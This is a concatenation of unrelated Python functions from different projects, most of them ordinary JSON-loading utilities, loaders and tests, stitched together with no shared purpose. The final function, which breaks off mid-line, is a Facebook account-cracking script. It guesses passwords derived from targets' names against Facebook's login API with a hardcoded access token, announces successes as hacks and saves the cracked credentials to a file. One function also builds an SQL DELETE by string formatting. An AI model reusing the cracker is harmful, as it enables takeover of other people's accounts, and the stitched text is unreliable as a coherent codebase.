def get_cur(self): types = ('alpha','beta','pre','rc',None,'p') version = self.base[0] if self.opts.version is not None: version = self.opts.version type = self.base[1] if self.opts.type == 'tagged': type = 4 self.opts.hash = None elif self.opts.type is not None: type = types.index(self.opts.type) if self.opts.branch: self.branch = self.opts.branch elif type < 4: self.branch = 'master' else: self.branch = 'fixes/{0}'.format('.'.join(version.split('.')[0:2])) if type != 4: if self.opts.hash is None: commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" + urllib.quote(self.branch, ''))) self.opts.hash = commit['sha'] if self.opts.date is None: self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d') print "Autoselecting hash: "+self.opts.hash elif self.opts.date is None: commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" + self.opts.hash)) self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d') self.cur = (version, type, self.opts.date) if self.opts.verbose: print 'New version set to: {0}-{1}'.format(self.name,self.get_version(self.cur))
def test_init_manifest_packageid(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") os.mkdir("org.xwalk.test") cmd = ( comm.HOST_PREFIX + comm.PackTools + "crosswalk-app manifest " + comm.XwalkPath + "org.xwalk.test --platforms=android --package-id=org.xwalk.test" ) os.system(cmd) with open(comm.ConstPath + "/../tools/org.xwalk.test/manifest.json") as json_file: data = json.load(json_file) updatecmd = ( comm.HOST_PREFIX + comm.PackTools + "crosswalk-app manifest " + comm.XwalkPath + "org.xwalk.test --platforms=android --package-id=org.test.foo" ) os.system(updatecmd) with open(comm.ConstPath + "/../tools/org.xwalk.test/manifest.json") as json_file_update: updatedata = json.load(json_file_update) comm.clear("org.xwalk.test") self.assertEquals(data["xwalk_package_id"].strip(os.linesep), "org.xwalk.test") self.assertEquals(updatedata["xwalk_package_id"].strip(os.linesep), "org.test.foo")
def __init__(self, name, require_local=False): localpath = os.path.join(conf_dir, name +'.local.json') globalpath = os.path.join(conf_dir, name + '.global.json') conf = {} localconf = None try: with open(globalpath, 'r') as f: conf = json.load(f) except IOError: pass #global file can not exist try: with open(localpath, 'r') as f: localconf = json.load(f) except IOError: if require_local: raise ValueError('Local settings file does not exist and is required: %s' % name +'.local.json') if localconf is not None: merge_dicts(conf, localconf) self.conf = conf
def upload_fixture_image( self, fixture_image_path, verification_stats_path, verification_result_path, headline='test' ): with self.app.app_context(): with open(fixture_image_path, mode='rb') as f: file_name = ntpath.basename(fixture_image_path) file_type = 'image' content_type = '%s/%s' % (file_type, imghdr.what(f)) file_id = app.media.put( f, filename=file_name, content_type=content_type, resource=get_resource_service('ingest').datasource, metadata={} ) inserted = [file_id] renditions = generate_renditions( f, file_id, inserted, file_type, content_type, rendition_config=config.RENDITIONS['picture'], url_for_media=url_for_media ) data = [{ 'headline': headline, 'slugline': 'rebuild', 'renditions': renditions, 'type': 'picture' }] image_id = get_resource_service('ingest').post(data) with open(verification_result_path, 'r') as f: self.expected_verification_results.append(json.load(f)) with open(verification_stats_path, 'r') as f: self.expected_verification_stats.append(json.load(f)) return image_id
def saveList(self): nameOfList = self.LNEDTlistName.text() restsOfEachDay = self.collect_restaurants() foods = self.collect_foods() pyJson = {} pyJson["version"]=self.form_data_version pyJson["restsOfEachDay"] = restsOfEachDay pyJson["foods"] = foods # write json file json_file = json.dumps(pyJson) file = open('./foodlists/' + nameOfList + '.json', 'w') file.write(json_file) #write database to file file.close() json_file = open('./foodlists/' + nameOfList + ".json", "r") json_decoded = json.load(json_file) json_file.close() datas_file = open('./data/_lisnamedata', "r+") datas_decoded = json.load(datas_file) if nameOfList.upper() not in (name.upper() for name in datas_decoded["listNames"]): datas_decoded["listNames"].append(nameOfList) # self.CMBXlists.addItem(nameOfList) # self.CMBXeditLists.addItem(nameOfList) datas_file.seek(0, 0) #go to begining of file datas_file.write(json.dumps(datas_decoded)) datas_file.close() self.fill_list_of_listname() self.showInfoMessage(u" لیست جدید",nameOfList+u" ذخیره شد ")
def load_config(self): """载入配置文件 先读入 conf/config.json 中的配置,再读入 conf/ 中其他 json 文件里的 entry """ config_dir = os.path.join(sys.path[0], 'conf') configs = {} # main config config_file_name = os.path.join(config_dir, 'config.json') try: with open(config_file_name) as config_fp: configs = json.load(config_fp) except Exception as e: log.error('main: failed to load config from conf/config.json: %s' % e) if 'entry' not in configs.keys(): configs['entry'] = {} # other entries for dir_path, dir_names, file_names in os.walk(config_dir): for file_name in file_names: if file_name != 'config.json' and file_name.endswith('.json'): # load sub config config_file_name = os.path.join(config_dir, file_name) try: with open(config_file_name) as config_fp: sub_configs = json.load(config_fp) # insert into main config for name, config in sorted(sub_configs['entry'].items()): if name not in configs['entry'].keys(): configs['entry'][name] = config except Exception as e: log.error('main: failed to load config from conf/%s: %s' % (file_name, e)) return configs
def get_proportional_hash_area(period): """ Takes in periods accepted by P2Pool - hour, day, week, month or year, then gets hash_data from the server running on localhost, parses it, and calculates each miner's hash power against the total during that time. """ import urllib2, json path1 = 'http://localhost:9332/web/graph_data/miner_hash_rates/last_'+period result1 = json.load(urllib2.urlopen(path1)) path2 = 'http://localhost:9332/web/graph_data/miner_dead_hash_rates/last_'+period result2 = json.load(urllib2.urlopen(path2)) hash_areas = {} total_hash_area = 0 for row in result1: for address in row[1]: try: hash_areas[address] += row[1][address] * row[2] except KeyError: hash_areas[address] = row[1][address] * row[2] finally: total_hash_area += row[1][address] * row[2] for row in result2: for address in row[1]: hash_areas[address] -= row[1][address]*row[2] total_hash_area -= row[1][address] * row[2] proportions = {} for address in hash_areas.keys(): proportions[address] = hash_areas[address] / total_hash_area hash_areas[address] /= 1000000000000000 return hash_areas, proportions
def install_vocabularies(): Vocabulary.objects.all().delete() VocabularyClass.objects.all().delete() VocabularyProperty.objects.all().delete() # load vocabularies vocabularies_fp = open(os.path.join(os.path.dirname(__file__), 'data/vocabularies.json')) data = json.load(vocabularies_fp) n_of_vocabularies = 0 with transaction.atomic(): # atomic transactions vastly improve performence for v in data: vocabulary = Vocabulary.objects.create(pk=v['pk'], category=v['fields']['category'], version=v['fields']['version'], votes=v['fields']['votes'], originalUrl=v['fields']['originalUrl'], description=v['fields']['description'], title=v['fields']['title'], downloads=v['fields']['downloads'], lodRanking=v['fields']['lodRanking'], preferredNamespacePrefix=v['fields']['preferredNamespacePrefix'], datePublished=v['fields']['datePublished'], downloadUrl=v['fields']['downloadUrl'], score=v['fields']['score'], uploader=User.objects.get(pk=v['fields']['uploader']), dateModified=v['fields']['dateModified'], dateCreated=v['fields']['dateCreated'], preferredNamespaceUri=v['fields']['preferredNamespaceUri'], example=v['fields']['example'], prevent_default_make=True) n_of_vocabularies += 1 vocabulary.prevent_default_make = False # reset to false so it can be updated vocabularies_fp.close() # load classes classes_fp = open(os.path.join(os.path.dirname(__file__), 'data/classes.json')) data = json.load(classes_fp) n_of_classes = 0 with transaction.atomic(): for c in data: VocabularyClass.objects.create(pk=c['pk'], description=c['fields']['description'], uri=c['fields']['uri'], label=c['fields']['label'], vocabulary=Vocabulary.objects.get(pk=c['fields']['vocabulary'])) n_of_classes += 1 classes_fp.close() # load properties properties_fp = open(os.path.join(os.path.dirname(__file__), 'data/properties.json')) data = json.load(properties_fp) n_of_properties = 0 with transaction.atomic(): for p in data: VocabularyProperty.objects.create(pk=p['pk'], description=p['fields']['description'], uri=p['fields']['uri'], vocabulary=Vocabulary.objects.get(pk=p['fields']['vocabulary']), label=p['fields']['label'], domain=p['fields']['domain'], range=p['fields']['range'], parent_uri=p['fields']['parent_uri']) n_of_properties += 1 properties_fp.close() return HttpResponse(json.dumps({ 'n_of_vocabularies': n_of_vocabularies, 'n_of_classes': n_of_classes, 'n_of_properties': n_of_properties }), status=200, content_type="application/json")
def main(we_file, w2i_file, sen): cc_matrix = "./input/cc_matrix.npy" if not os.path.isfile(w2i_file): sentences, word2idx = get_reuters_data(n_vocab=2000) with open(w2i_file, 'w') as f: json.dump(word2idx, f) with open(sen, 'w') as f: json.dump(sentences, f) else: with open(w2i_file) as data_file: word2idx = json.load(data_file) with open(sen) as data_file: sentences = json.load(data_file) V = len(word2idx) model = Glove(50, V, 10) # model.fit(sentences, cc_matrix=cc_matrix, epochs=20) # ALS model.fit( sentences, cc_matrix=cc_matrix, learning_rate=3*10e-5, reg=0.01, epochs=2000, gd=True, use_theano=True ) # gradient descent model.save(we_file)
def ReadJson(config_file): """Read in a JSON configuration file and return the corresponding dicts. A JSON file only defines a single dict. However to be parallel to the functionality of ReadYaml, the output is a list with a single item, which is the dict defined by the JSON file. @param config_file The name of the configuration file to read. @returns [config_dict] """ import json with open(config_file) as f: try: # cf. http://stackoverflow.com/questions/6921699/can-i-get-json-to-load-into-an-ordereddict-in-python config = json.load(f, object_pairs_hook=OrderedDict) except TypeError: # pragma: no cover # for python2.6, json doesn't come with the object_pairs_hook, so # try using simplejson, and if that doesn't work, just use a regular dict. # Also, it seems that if the above line raises an exception, the file handle # is not left at the beginning, so seek back to 0. f.seek(0) try: import simplejson config = simplejson.load(f, object_pairs_hook=OrderedDict) except ImportError: config = json.load(f) # JSON files only ever define a single job, but we need to return a list with this one item. return [config]
def install_analytics(): Category.objects.all().delete() Algorithm.objects.all().delete() # load categories categories_fp = open(os.path.join(os.path.dirname(__file__), 'data/categories.json')) data = json.load(categories_fp) n_of_categories = 0 for c in data: Category.objects.create(pk=c['pk'], name=c['fields']['name'], description=c['fields']['description']) n_of_categories += 1 categories_fp.close() # load algorithms algorithms_fp = open(os.path.join(os.path.dirname(__file__), 'data/algorithms.json')) data = json.load(algorithms_fp) n_of_algorithms = 0 for a in data: Algorithm.objects.create(pk=a['pk'], category=Category.objects.get(pk=a['fields']['category']), name=a['fields']['name'], description=a['fields']['description']) n_of_algorithms += 1 algorithms_fp.close() return HttpResponse(json.dumps({ 'n_of_categories': n_of_categories, 'n_of_algorithms': n_of_algorithms }), status=200, content_type="application/json")
def getcommits_from_project(project): global access_token url1 = 'https://api.github.com/user' request1=Request(url1) request1.add_header('Authorization', 'token %s' % access_token) response1 = urlopen(request1) result1 = json.load(response1) person = result1['login'] repo_info=['Fasta','js2839'] owner= repo_info[1] repo = repo_info[0] url = 'https://api.github.com/repos/'+owner+'/'+repo+'/commits' data=[] request = Request(url) request.add_header('Authorization', 'token %s' % access_token) response = urlopen(request) result = json.load(response) for i in range(len(result)): print 'result0' data.append([result[i]['commit']['message'], result[i]['commit']['author']['name'], result[i]['commit']['author']['date']]) print data[i] for com in data: (per,sub_name)=getPercentage(com[0]) err = save_to_db( per, sub_name, com[1], project, com[2]) return
def json(self, json_file): """ Reads and parses the input of a json file handler or file. Json files are parsed differently depending on if the root is a dictionary or an array. 1) If the json's root is a dictionary, these are parsed into a sequence of (Key, Value) pairs 2) If the json's root is an array, these are parsed into a sequence of entries >>> seq.json('examples/users.json').first() [u'sarah', {u'date_created': u'08/08', u'news_email': True, u'email': u'*****@*****.**'}] :param json_file: path or file containing json content :return: Sequence wrapping jsonl file """ if isinstance(json_file, str): file_open = get_read_function(json_file, self.disable_compression) input_file = file_open(json_file) json_input = jsonapi.load(input_file) elif hasattr(json_file, 'read'): json_input = jsonapi.load(json_file) else: raise ValueError('json_file must be a file path or implement the iterator interface') if isinstance(json_input, list): return self(json_input) else: return self(six.viewitems(json_input))
def populate_recipe_tables(): # pylint: disable=too-many-locals """Populate tables about recipes.""" # Get all plans and recipes with open(JsonRes.craftplan, 'r', encoding='UTF-8') as f_recipes: recipes = json.load(f_recipes) with open(JsonRes.plans_en, 'r', encoding='UTF-8') as f_plans: plans = flatten_nested_dict(json.load(f_plans)) for recipe, component in recipes.items(): # filter matis affiliadted recipe to get higher quality recipe if recipe[:3] == 'bcf': recipe = recipe.replace('bcf', 'bcc') # Filter recipes to keep only those are not affiliated to a faction if recipe[:3] != 'bcc' and recipe[:4] != 'bcmj': continue quality = get_plan_quality(recipe) try: # Split the recipe code to separate the quality code from the rest # pylint: disable=unpacking-non-sequence keypath, infos = get_plan(plans, recipe.split('_')[0]) except TypeError: print( "The recipe code: {} was not found in the ".format(recipe) + "flatten dict of plans.", file=sys.stderr ) continue *categories, recipe_name = keypath.split("|") if "ammo" in recipe_name: # recipe_name += " of " + categories[-1].lower() recipe_name = categories[-1] + " " + recipe_name.lower() categories[-1] = None if categories[0] == "Weapon": if "One" in categories[-1]: categories[-1] = 1 elif "Two" in categories[-1] or "hand" in categories[-1]: categories[-1] = 2 else: categories[-1] = None recipe_cat_id = insert_recipe_category(*categories) recipe_id = insert_recipe( recipe_name, quality, infos['icon'] + '.png', recipe_cat_id ) # Recipe already exists if recipe_id == 'stop': continue # Loop over plan's component for comp, amount in component['mpft'].items(): insert_recipe_component(recipe_id, comp, amount)
def getJSON (self, name): file_name = os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "data", name+".json") try: self.json_data = json.load(open(file_name, 'r')) except IOError: subprocess.call (["./get_residue.sh", file_name], shell=True) self.json_data = json.load(open(file_name, 'r'))
def download(self, ud, d): """Fetch url""" jsondepobj = {} shrinkobj = {} lockdown = {} if not os.listdir(ud.pkgdatadir) and os.path.exists(ud.fullmirror): dest = d.getVar("DL_DIR", True) bb.utils.mkdirhier(dest) runfetchcmd("tar -xJf %s" % (ud.fullmirror), d, workdir=dest) return shwrf = d.getVar('NPM_SHRINKWRAP', True) logger.debug(2, "NPM shrinkwrap file is %s" % shwrf) try: with open(shwrf) as datafile: shrinkobj = json.load(datafile) except: logger.warning('Missing shrinkwrap file in NPM_SHRINKWRAP for %s, this will lead to unreliable builds!' % ud.pkgname) lckdf = d.getVar('NPM_LOCKDOWN', True) logger.debug(2, "NPM lockdown file is %s" % lckdf) try: with open(lckdf) as datafile: lockdown = json.load(datafile) except: logger.warning('Missing lockdown file in NPM_LOCKDOWN for %s, this will lead to unreproducible builds!' % ud.pkgname) if ('name' not in shrinkobj): self._getdependencies(ud.pkgname, jsondepobj, ud.version, d, ud) else: self._getshrinkeddependencies(ud.pkgname, shrinkobj, ud.version, d, ud, lockdown, jsondepobj) with open(ud.localpath, 'w') as outfile: json.dump(jsondepobj, outfile)
def merge_data_from_crawl(): #To refactor far too long category_file = sorted(os.listdir(os.getcwd()+"/data/data_from_crawl")) movies_category = [file_name for file_name in category_file if not any(c.isdigit() for c in file_name)] for category in movies_category: if category.endswith('.json'): category = category[:-5] if category.endswith('die'): movies_with_part = [file_name for file_name in category_file if (len(file_name) < 30 and category in file_name)] else: movies_with_part = [file_name for file_name in category_file if category in file_name] if len(movies_with_part) > 1: all_part_data = {} for movies_part in movies_with_part: with open('data/data_from_crawl/' + movies_part) as part: data = json.load(part) for movie_title, movie_data in data.iteritems(): all_part_data[movie_title] = movie_data with io.open("data/data_to_use/" + movies_with_part[0] , "w+", encoding='utf8') as all_part: output = json.dumps(all_part_data, ensure_ascii=False, encoding='utf8') all_part.write(unicode(output)) if len(movies_with_part) == 1 and movies_with_part[0][0] != '.': with open('data/data_from_crawl/' + movies_with_part[0]) as part: data = json.load(part) with io.open("data/data_to_use/" + movies_with_part[0] , "w+", encoding='utf8') as all_part: output = json.dumps(data, ensure_ascii=False, encoding='utf8') all_part.write(unicode(output))
def test_post_works(self): site = WPSiteFactory(url='http://www.foo.com/') # assert the post we're about to make doesn't exist self.assertFalse(WPPost.objects.filter(wp=site, id=521).exists()) # sample POST based on a RequestBin[requestb.in] test request = self.factory.post('/foo/', { 'hook': 'save_post', 'ID': '521', 'guid': 'http://www.foo.com/?p=521', }) data = json.load(open(os.path.join(BASE_DIR, 'support', 'posts_521.json'))) with mock.patch('wjordpress.models.WPApi') as MockApi: # got to be a better syntax for this MockApi.return_value = mock.MagicMock(**{'posts.return_value': data}) response = self.view.post(request, site.pk) self.assertEqual(response.status_code, 200) # assert this post now exists self.assertTrue(WPPost.objects.filter(wp=site, id=521).exists()) post = WPPost.objects.filter(wp=site, id=521).get() self.assertTrue(post.author) # Contrived example: author changes locally, will it get set again? post.author = None post.save() data = json.load(open(os.path.join(BASE_DIR, 'support', 'posts_521.json'))) with mock.patch('wjordpress.models.WPApi') as MockApi: # got to be a better syntax for this MockApi.return_value = mock.MagicMock(**{'posts.return_value': data}) response = self.view.post(request, site.pk) # sanity check self.assertEqual(response.status_code, 200) post = WPPost.objects.filter(wp=site, id=521).get() # assert foreign relations were created self.assertTrue(post.author)
def main(): args = parse_args() ins = args.in_ out = args.out out_format = FORMATS[args.format] info = args.info one_file_no_info = False if len(ins) > 1 and info is None: print('error: cannot have multiple inputs without an info header.', file=sys.stderr) sys.exit(1) elif info is None: info = ins[0] one_file_no_info = True info_json = json.load(info) platform = PlatformInfo(info_json) print(out_format.open(platform), file=out) for in_ in ins: if one_file_no_info: data = info_json else: data = json.load(in_) data.update(info_json) intrinsics = IntrinsicSet(platform, data) for intr in intrinsics.intrinsics(): for mono in intr.monomorphise(): print(out_format.render(mono), file=out) print(out_format.close(), file=out)
def crash_recover(): global crash_obj tidy_reset=0 try: with open(crash_file): print "recovering from %s" % crash_file crash_json=open(crash_file) crash_progress=json.load(crash_json) tidy_reset=1 pass except IOError: print "no crash log found. Executing as normal" pass if tidy_reset: print "\tRestoring progress" crash_json = open(crash_file) crash_obj=json.load(crash_json) else: validate_delete = raw_input("Delete all entries to %s in %s.%s? (Y/N)" % (start_date,db_schema,db_name)) if validate_delete.upper() == 'Y': db_cursor.execute("DELETE FROM %s WHERE date>='%s'" % (db_name,start_date)) db.commit() print "\tCleaning up ALL entries to %s" % start_date else: print "\tWARNING: values may be wrong without scrubbing duplicates" #Initialize crash_obj crash_obj={} crash_obj["parsed_data"]={} crash_obj["progress"]={}
def do_environment_model_edit(mc, args): """Edit an environment's object model.""" jp_obj = None if not args.filename: jp_obj = json.load(sys.stdin) else: with open(args.filename) as fpatch: jp_obj = json.load(fpatch) if not isinstance(jp_obj, list): raise exceptions.CommandError('JSON-patch must be a list of changes') for change in jp_obj: if 'op' not in change or 'path' not in change: raise exceptions.CommandError('Every change in JSON-patch must ' 'contain "op" and "path" keys') op = change['op'] if op not in ['add', 'replace', 'remove']: raise exceptions.CommandError('The value of "op" item must be ' '"add", "replace" or "remove", ' 'got {0}'.format(op)) if op != 'remove' and 'value' not in change: raise exceptions.CommandError('"add" or "replace" change in ' 'JSON-patch must contain "value" ' 'key') session_id = args.session_id new_model = mc.environments.update_model(args.id, jp_obj, session_id) print(utils.json_formatter(new_model))
def test_stop_replication(self): utils.debug("===========test_stop_replication=========") utils.run_vtctl('ChangeSlaveType test_nj-0000062345 replica') time.sleep(10) perform_insert(100) master_position = utils.mysql_query(62344, 'vt_test_keyspace', 'show master status') #The sleep is needed here, so the invalidator can catch up and the number can be tested. replica_tablet.mquery('vt_test_keyspace', "select MASTER_POS_WAIT('%s', %d)" % (master_position[0][0], master_position[0][1]), 5) time.sleep(5) inv_count1 = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['Totals']['Invalidations'] replica_tablet.mquery('vt_test_keyspace', "stop slave") perform_insert(100) # EOF is returned after 30s, sleeping a bit more to ensure we catch the EOF # and can test replication stop effectively. time.sleep(35) replica_tablet.mquery('vt_test_keyspace', "start slave") master_position = utils.mysql_query(62344, 'vt_test_keyspace', 'show master status') #The sleep is needed here, so the invalidator can catch up and the number can be tested. replica_tablet.mquery('vt_test_keyspace', "select MASTER_POS_WAIT('%s', %d)" % (master_position[0][0], master_position[0][1]), 5) time.sleep(10) invalidatorStats = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/vars" % replica_host)))['CacheInvalidationProcessor'] utils.debug("invalidatorStats %s" % invalidatorStats) inv_count2 = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['Totals']['Invalidations'] utils.debug("invalidator count1 %d count2 %d" % (inv_count1, inv_count2)) self.assertEqual(invalidatorStats["States"]["Current"], "Enabled", "Row-cache invalidator should be enabled") self.assertTrue(inv_count2 - inv_count1 > 0, "invalidator was able to restart after a small pause in replication")
def load_config(): global config global pkmn_info global type_chart global type_list global raid_info global egg_timer global raid_timer global icon_list global GOOGLE_API_KEY global GOOGLE_MAPS_URL # Load configuration with open("config.json", "r") as fd: config = json.load(fd) # Set up message catalog access # language = gettext.translation('clembot', localedir='locale', languages="en") # language.install() # pokemon_language = [config['pokemon-language']] # pokemon_path_source = os.path.join('locale', '{0}', 'pkmn.json').format(config['pokemon-language']) # Load Pokemon list and raid info with open(os.path.join('data', 'pkmn.json'), "r") as fd: pkmn_info = json.load(fd) with open(os.path.join('data', "icon.json"), "r") as fd: icon_list = json.load(fd) # Set spelling dictionary to our list of Pokemon spelling.set_dictionary(pkmn_info['pokemon_list'])
def load_data(self): logging.info("Starting data loads.") self.data = json.load(open('data/features.json')) helpers.normalize_features(self.data) self.dev_movie_ids = set(json.load(open('data/dev.json'))) self.test_movie_ids = set(json.load(open('data/test.json'))) # self.data = dict((k,self.data[unicode(k)]) for k in (list(self.dev_movie_ids)[0:900] + list(self.test_movie_ids)[0:100])) # Transforms the data so they can be used by pybrain. logging.info("Loading feature keys...") feature_keys = set() for movie_id, features in self.data.iteritems(): feature_keys.update(features['features'].keys()) self.feature_keys = list(feature_keys) logging.info("Feature keys loaded.") logging.info("Vectorizing features...") self.dev_features = [] self.dev_scores = [] self.test_features = [] self.test_scores = [] for movie_id, features in self.data.iteritems(): if int(movie_id) in self.dev_movie_ids: features_list = self.dev_features scores_list = self.dev_scores else: features_list = self.test_features scores_list = self.test_scores features_list.append([features['features'].get(feature_key, 0) for feature_key in self.feature_keys]) scores_list.append([features['rating']]) logging.info("Features vectorized.")
def get_first_image_specific_implementation(self, species, index): #returns the url of the first image of the species found in the source (return_status, ids) = self.get_ids(species) if not(return_status): self.err_list[index] = (species, ids) return else: id = ids[0] url = 'http://eol.org/api/pages/1.0/' + str(id) + '.json?images=10&videos=0&sounds=0&maps=0&text=0&iucn=false&subjects=overview&licenses=all&details=false&common_names=' data_pages = '' i = 0 while True: try: data_pages = json.load(urllib2.urlopen(url)) break except URLError: if i < 3: i = i + 1 else: self.err_list[index] = (species, constants.CONNECTION_ERROR) return except: self.err_list[index] = (species, constants.JSON_ERROR) return pages_list = data_pages['dataObjects'] if len(pages_list) == 0: self.err_list[index] = (species, constants.NO_IMAGES_FOR_SPECIES) return else: object_id = pages_list[0]['dataObjectVersionID'] url = 'http://eol.org/api/data_objects/1.0/' + str(object_id) + '.json' image_list = '' i = 0 while True: try: image_list = json.load(urllib2.urlopen(url))['dataObjects'] break except URLError: if i < 3: i = i + 1 else: self.err_list[index] = (species, constants.CONNECTION_ERROR) return except: self.err_list[index] = (species, constants.JSON_ERROR) return if len(image_list) == 0: self.err_list[index] = (species, constants.NO_IMAGES_FOR_SPECIES) return else: self.img_list[index] = (species, image_list[0]['mediaURL']) return
def get_jscs_options(path): option_sets = [] jscsrc_path = findup(path, '.jscsrc') if os.path.isfile(jscsrc_path): jscsrc = lazy_parse_comment_json( open(jscsrc_path, 'r', encoding='UTF-8')) option_sets.append((jscsrc_path, jscsrc)) jscs_json_path = findup(path, '.jscs.json') if os.path.isfile(jscs_json_path): jscs_json = json.load(open(jscs_json_path, 'r', encoding='UTF-8')) option_sets.append((jscs_json_path, jscs_json)) package_path = findup(path, 'package.json') if os.path.isfile(package_path): package = json.load(open(package_path, 'r', encoding='UTF-8')) if 'jscsConfig' in package: option_sets.append((package_path, package['jscsConfig'])) # Sort sets by dirname length option_sets.sort(key=lambda x: len(os.path.dirname(x[0]))) # Merge options together options = dict() for path, option_set in option_sets: options.update(option_set) return options
def dynamic_params_from_model(model): '''Get user-submitted dynamic parameters from a DynamicSaveInputs model''' ser_model = serializers.serialize('json', [model]) user_inputs = json.loads(ser_model) inputs = user_inputs[0]['fields'] # Read user-modifiable parameters list from file usermods_path = os.path.join(os.path.split(__file__)[0], "ogusa_user_modifiable.json") with open(usermods_path, "r") as f: ump = json.load(f) USER_MODIFIABLE_PARAMS = ump["USER_MODIFIABLE_PARAMS"] # Read ogusa parameters list from file ogusa_params_path = os.path.join(os.path.split(__file__)[0], "ogusa_parameters.json") with open(ogusa_params_path, "r") as f: OGUSA_PARAMS = json.load(f) params = {k:inputs[k] for k in USER_MODIFIABLE_PARAMS} for k, v in params.items(): if v == '': params[k] = str(OGUSA_PARAMS[k]['value']) return params
def test_cache_invalidation(self): utils.debug("===========test_cache_invalidation=========") master_position = utils.mysql_query(62344, 'vt_test_keyspace', 'show master status') #The sleep is needed here, so the invalidator can catch up and the number can be tested. replica_tablet.mquery('vt_test_keyspace', "select MASTER_POS_WAIT('%s', %d)" % (master_position[0][0], master_position[0][1]), 5) time.sleep(5) invalidations = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['Totals']['Invalidations'] invalidatorStats = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/vars" % replica_host)))['CacheInvalidationProcessor'] utils.debug("Invalidations %d InvalidatorStats %s" % (invalidations, invalidatorStats)) self.assertTrue(invalidations > 0, "Invalidations are flowing through.") res = replica_tablet.mquery('vt_test_keyspace', "select min(id) from vt_insert_test") self.assertNotEqual(res[0][0], None, "Cannot proceed, no rows in vt_insert_test") id = int(res[0][0]) stats_dict = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['vt_insert_test'] utils.debug("vt_insert_test stats %s" % stats_dict) misses = stats_dict['Misses'] hits = stats_dict["Hits"] replica_tablet.vquery("select * from vt_insert_test where id=%d" % (id), path='test_keyspace/0') stats_dict = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['vt_insert_test'] self.assertEqual(stats_dict['Misses'] - misses, 1, "This shouldn't have hit the cache") replica_tablet.vquery("select * from vt_insert_test where id=%d" % (id), path='test_keyspace/0') stats_dict = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['vt_insert_test'] self.assertEqual(stats_dict['Hits'] - hits, 1, "This should have hit the cache")
def read_attrs(glider_config_path, glider_name): # Load in configurations attrs = {} # Load institute global attributes global_attrs_path = ( os.path.join(glider_config_path, "global_attributes.json") ) with open(global_attrs_path, 'r') as f: attrs['global'] = json.load(f) # Load deployment attributes (including global attributes) deployment_attrs_path = ( os.path.join(glider_config_path, glider_name, "deployment.json") ) with open(deployment_attrs_path, 'r') as f: attrs['deployment'] = json.load(f) # Load instruments instruments_attrs_path = ( os.path.join(glider_config_path, glider_name, "instruments.json") ) with open(instruments_attrs_path, 'r') as f: attrs['instruments'] = json.load(f) # Fill in global attributes attrs['global'].update(attrs['deployment']['global_attributes']) return attrs
def load_options(): """Read various proselintrc files, allowing user overrides.""" possible_defaults = ( '/etc/proselintrc', os.path.join(proselint_path, '.proselintrc'), ) options = {} has_overrides = False for filename in possible_defaults: try: options = json.load(open(filename)) break except IOError: pass try: user_options = json.load(open(os.path.expanduser('~/.proselintrc'))) has_overrides = True except IOError: pass if has_overrides: if 'max_errors' in user_options: options['max_errors'] = user_options['max_errors'] if 'checks' in user_options: for (key, value) in user_options['checks'].items(): try: options['checks'][key] = value except KeyError: pass return options
def main(arg): global cekpoint,oks user = arg try: os.mkdir('out') except OSError: pass #Dev:Asim_Ch try: a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket) b = json.loads(a.text) pass1 = b['first_name'] + b['last_name'] data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;91m[ ✓ ] \x1b[1;91mHack100%💉' print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m : \x1b[1;91m' + b['name'] print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m : \x1b[1;91m' + user print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass1 + '\n' oks.append(user+pass1) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95m[ ✖ ] \x1b[1;95mCeckpoint' print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m : \x1b[1;95m' + b['name'] print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m : \x1b[1;95m' + user print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass1 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass1+"\n") cek.close() cekpoint.append(user+pass1) else: pass2 = b['last_name']+'123' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;91m[ ✓ ] \x1b[1;91mHack100%💉' print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m : \x1b[1;91m' + b['name'] print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m : \x1b[1;91m' + user print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass2 + '\n' oks.append(user+pass2) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95m[ ✖ ] \x1b[1;95mCeckpoint' print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m : \x1b[1;95m' + b['name'] print 